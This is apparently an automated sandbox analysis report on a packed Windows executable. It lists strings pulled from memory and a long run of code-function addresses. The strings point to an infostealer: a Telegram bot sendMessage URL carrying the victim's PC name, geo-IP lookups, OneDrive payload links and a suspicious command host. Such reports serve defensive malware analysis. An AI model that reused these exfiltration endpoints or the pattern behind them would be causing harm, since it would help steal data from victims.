Source: ________.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: ________.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: ________.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: ________.exe, 00000003.00000002.3975771250.0000000032EFD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://foodex.com.pk
Source: ________.exe, 00000003.00000002.3975771250.0000000032E67000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000003.00000002.3975771250.0000000032EFD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.foodex.com.pk
Source: ________.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: ________.exe | String found in binary or memory: http://ocsp.sectigo.com0
Source: ________.exe, 00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ________.exe, 00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
Source: ________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: ________.exe, 00000003.00000002.3954718526.00000000025B8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.onedrive.com/
Source: ________.exe, 00000003.00000002.3954718526.00000000025F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.onedrive.com/v1.0/shares/s
Source: ________.exe, 00000003.00000002.3975771250.0000000032E49000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: ________.exe, 00000003.00000002.3975771250.0000000032E49000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: ________.exe, 00000003.00000002.3975771250.0000000032E49000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: ________.exe, 00000003.00000002.3975771250.0000000032E49000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:141700%0D%0ADate%20a
Source: ________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ________.exe, 00000003.00000002.3975771250.0000000032F20000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000003.00000002.3975771250.0000000032F51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: ________.exe, 00000003.00000002.3975771250.0000000032F1B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: ________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: ________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: ________.exe, 00000003.00000003.1709008650.0000000002628000.00000004.00000020.00020000.00000000.sdmp, ________.exe, 00000003.00000003.1735530271.0000000002628000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fa2ytg.dm.files.1drv.com/
Source: ________.exe, 00000003.00000003.1735612317.0000000002628000.00000004.00000020.00020000.00000000.sdmp, ________.exe, 00000003.00000003.1735530271.0000000002628000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fa2ytg.dm.files.1drv.com/oft
Source: ________.exe, 00000003.00000003.1735612317.0000000002628000.00000004.00000020.00020000.00000000.sdmp, ________.exe, 00000003.00000003.1735530271.0000000002628000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fa2ytg.dm.files.1drv.com/y4mMPMXGbTpZA5YgHaTE31Fc-Wg6Iu9gpthjDJlQ5ie3dz395ZMCu5rd38cOpuGMXl4
Source: ________.exe, 00000003.00000003.1735530271.0000000002628000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fa2ytg.dm.files.1drv.com/y4m_K24I_IZwtc1os-c0UOoxdtzKrradsOM2iRZNEMhYqB_oUmwpewHC2hedgX3rXjZ
Source: ________.exe, 00000003.00000002.3975771250.0000000032E49000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000003.00000002.3975771250.0000000032DAE000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000003.00000002.3975771250.0000000032E1F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: ________.exe, 00000003.00000002.3975771250.0000000032DAE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: ________.exe, 00000003.00000002.3975771250.0000000032E1F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.68
Source: ________.exe, 00000003.00000002.3975771250.0000000032E49000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000003.00000002.3975771250.0000000032DDC000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000003.00000002.3975771250.0000000032E1F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.68$
Source: ________.exe | String found in binary or memory: https://sectigo.com/CPS0
Source: ________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: ________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: ________.exe, 00000003.00000002.3975771250.0000000032F51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
Source: ________.exe, 00000003.00000002.3975771250.0000000032F42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/8ub
Source: ________.exe, 00000003.00000002.3975771250.0000000032F4C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49730 version: TLS 1.2
Source: C:\Users\user\Desktop\________.exe | Code function: 1_2_004052D3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\________.exe | Code function: 1_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\________.exe | File created: C:\Windows\resources\0809
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F009603_2_35F00960
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F083603_2_35F08360
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0D9603_2_35F0D960
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F044673_2_35F04467
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F01B683_2_35F01B68
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0AE683_2_35F0AE68
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F06B6A3_2_35F06B6A
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0126F3_2_35F0126F
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0966F3_2_35F0966F
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0C6503_2_35F0C650
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F009503_2_35F00950
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F083503_2_35F08350
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F03B583_2_35F03B58
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0F1583_2_35F0F158
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F01B583_2_35F01B58
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0AE583_2_35F0AE58
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F000403_2_35F00040
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F070403_2_35F07040
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0C6413_2_35F0C641
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0F1473_2_35F0F147
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F09B483_2_35F09B48
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F03B483_2_35F03B48
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0B3303_2_35F0B330
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F05B373_2_35F05B37
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0DE383_2_35F0DE38
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F09B383_2_35F09B38
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0F6203_2_35F0F620
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F032273_2_35F03227
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F052283_2_35F05228
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F088283_2_35F08828
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0DE283_2_35F0DE28
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0702F3_2_35F0702F
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F017103_2_35F01710
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0A0103_2_35F0A010
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0F6103_2_35F0F610
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0CB163_2_35F0CB16
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F029183_2_35F02918
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0CB183_2_35F0CB18
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F052183_2_35F05218
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F088193_2_35F08819
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0B31F3_2_35F0B31F
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0E3003_2_35F0E300
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F017013_2_35F01701
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F000063_2_35F00006
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F049083_2_35F04908
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F075083_2_35F07508
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0290A3_2_35F0290A
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F2D0D0
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F26A80
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F2E808
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F28BF3
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F25DF0
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F2E7FB
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F22BF8
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F241E0
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F20FE0
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F241D1
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F257C0
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F225C0
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F2CDC1
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F20FCF
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F225B0
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F257B0
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F277B0
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F23BA0
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F209A0
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F29DA9
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F20990
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F23B90
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F26D90
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F25180
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F21F80
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F2B981
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F29388
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F25170
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F26760
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F23560
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F20360
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F21F6F
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F20350
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F26751
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F24B40
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F21940
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F2A540
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F24B31
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F2CB39
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F26120
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F22F20
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F29B20
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F2192F
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F26110
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F2C119
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F24500
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F21300
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F29100
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F22F0F
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F212F0
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F244F1
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F2B6F8
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F25AE0
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F228E0
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F228D0
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F2ACD8
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F23EC0
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F20CC0
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F2D0C0
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F27CC1
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F25ACF
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F23EB0
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F2C8B0
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F2A2B8
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F254A0
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F222A0
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F272A1
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F20CAF
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F2BE90
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F25491
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F29899
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F23880
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F20680
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F2228F
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F23870
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F20670
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F2B470
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F28E79
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F24E60
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F21C60
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F26A6F
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F21C50
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F24E51
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F28459
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F23240
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F20040
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F26440
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F23230
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F26430
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F2003A
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F27A39
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F24820
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F21620
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F2C628
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F29613
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F21610
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F27019
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F25E00
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F22C00
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F2BC09
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F2480F
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F37FA8
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3F988
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3F668
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F31828
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F321F1
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3A1F9
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3D3F8
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F36DE0
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3B7E8
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F385E8
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3E9E8
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F347E8
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F309D0
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F385D7
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3E9D7
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3B7D8
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F309C1
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F363C0
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F39BC8
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3CDC8
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3CDB8
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F333A8
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3E3A8
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3B1A8
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3B197
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F37F99
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3E399
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F34F80
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3C788
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F39588
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3957A
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3F97A
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3C779
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F37578
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F34561
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F31360
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F31F68
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3AB68
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3DD68
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3DD59
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F36B58
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3AB58
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F33B41
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3C148
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F38F48
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3F348
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3134F
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3C137
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F38F38
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3F338
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F33120
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3D728
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3A528
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F37D12
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3D717
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3A518
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F32700
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3ED08
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F30508
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F38908
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3BB08
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F372F1
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F304F7
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F388F7
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3ECF7
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3BAF9
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F34CF8
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3D0E8
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F39EE8
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F368D0
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3D0DA
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F342D8
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F39ED8
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F31CDF
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3B4C8
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F382C8
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3E6C8
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F35EB1
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F338B9
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3B4B9
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3E6B9
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F382B8
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3FCA8
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3CAA8
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F398A8
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F35490
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3FC97
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3CA9A
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F30E98
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F32E98
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F39898
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F30E89
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3E088
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3AE88
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F34A70
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3AE7A
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F32478
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3E07C
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3C468
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F39268
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F37068
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F34050
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3C457
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3F659
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F39258
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F30040
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3A848
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3DA48
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F36648
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F33630
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3A839
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3DA39
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F35C29
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3F028
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F38C28
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3BE28
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F32C11
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F38C1A
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F31818
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3F018
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F30006
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F35208
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3D408
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35F3A208
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_360B36F0
